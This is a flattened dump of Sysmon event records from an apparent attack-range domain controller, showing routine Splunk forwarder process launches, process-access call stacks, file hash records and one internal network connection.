10341000x80000000000000002247171Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:02.843{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002247170Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:02.843{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002247169Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:02.843{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002247168Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:02.843{05ADC7E1-229D-6039-0500-00000000AD01}6361168C:\Windows\system32\csrss.exe{05ADC7E1-6ED6-603E-1AAB-00000000AD01}4824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002247167Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:02.843{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6ED6-603E-1AAB-00000000AD01}4824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002247166Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:02.844{05ADC7E1-6ED6-603E-1AAB-00000000AD01}4824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002247165Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:02.566{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E26C5E25235072BBDC865F3B6BC1CD9A,SHA256=2A82C07E70F353C8E2F114238C3D013BAB3EB2C63A5352A42830FCD47FFE5E32,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247164Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:02.546{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D740C9261144A42C134EADC5FCB5E922,SHA256=3D5B26AAC3499AE64C87E970C035D7EB3684765AFE3CD4A0A6BC0072914F6EFF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247184Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:03.868{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F45F07B85475AE8EC8DCB8846F0FC4ED,SHA256=758275BCA2BADDC39A5C2D96FB8627CD4E74F46A775DF1C770E7C7E18331260E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247183Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:03.593{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01842139A3AFE08E51C165B41D641B8B,SHA256=579BBCE4849192B1D6B4B4C21D6DC7F1BF0B5B901A9422B7F630A2A4C1E93FE2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002247182Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:03.515{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6ED7-603E-1BAB-00000000AD01}10324C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002247181Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:03.515{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002247180Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:03.515{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002247179Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:03.515{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002247178Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:03.515{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002247177Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:03.515{05ADC7E1-229D-6039-0500-00000000AD01}636752C:\Windows\system32\csrss.exe{05ADC7E1-6ED7-603E-1BAB-00000000AD01}10324C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002247176Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:03.515{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6ED7-603E-1BAB-00000000AD01}10324C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002247175Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:03.516{05ADC7E1-6ED7-603E-1BAB-00000000AD01}10324C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002247174Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:03.031{05ADC7E1-6ED6-603E-1AAB-00000000AD01}482411212C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002247204Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:04.868{05ADC7E1-6ED8-603E-1DAB-00000000AD01}989215892C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002247203Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:04.668{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6ED8-603E-1DAB-00000000AD01}9892C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002247202Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:04.668{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002247201Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:04.668{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002247200Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:04.668{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002247199Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:04.668{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002247198Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:04.668{05ADC7E1-229D-6039-0500-00000000AD01}636652C:\Windows\system32\csrss.exe{05ADC7E1-6ED8-603E-1DAB-00000000AD01}9892C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002247197Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:04.668{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6ED8-603E-1DAB-00000000AD01}9892C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002247196Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:04.664{05ADC7E1-6ED8-603E-1DAB-00000000AD01}9892C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002247195Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:04.640{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F5608B1A417C3284E73DA0747DBE62C,SHA256=AB4DF367E5331A9423C2513F7A2C52E48E52B507C8296630BE4D0D3A0AF57F69,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002247194Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:54.280{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60235-false10.0.1.12-8000- 10341000x80000000000000002247193Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:04.202{05ADC7E1-6ED8-603E-1CAB-00000000AD01}998015308C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 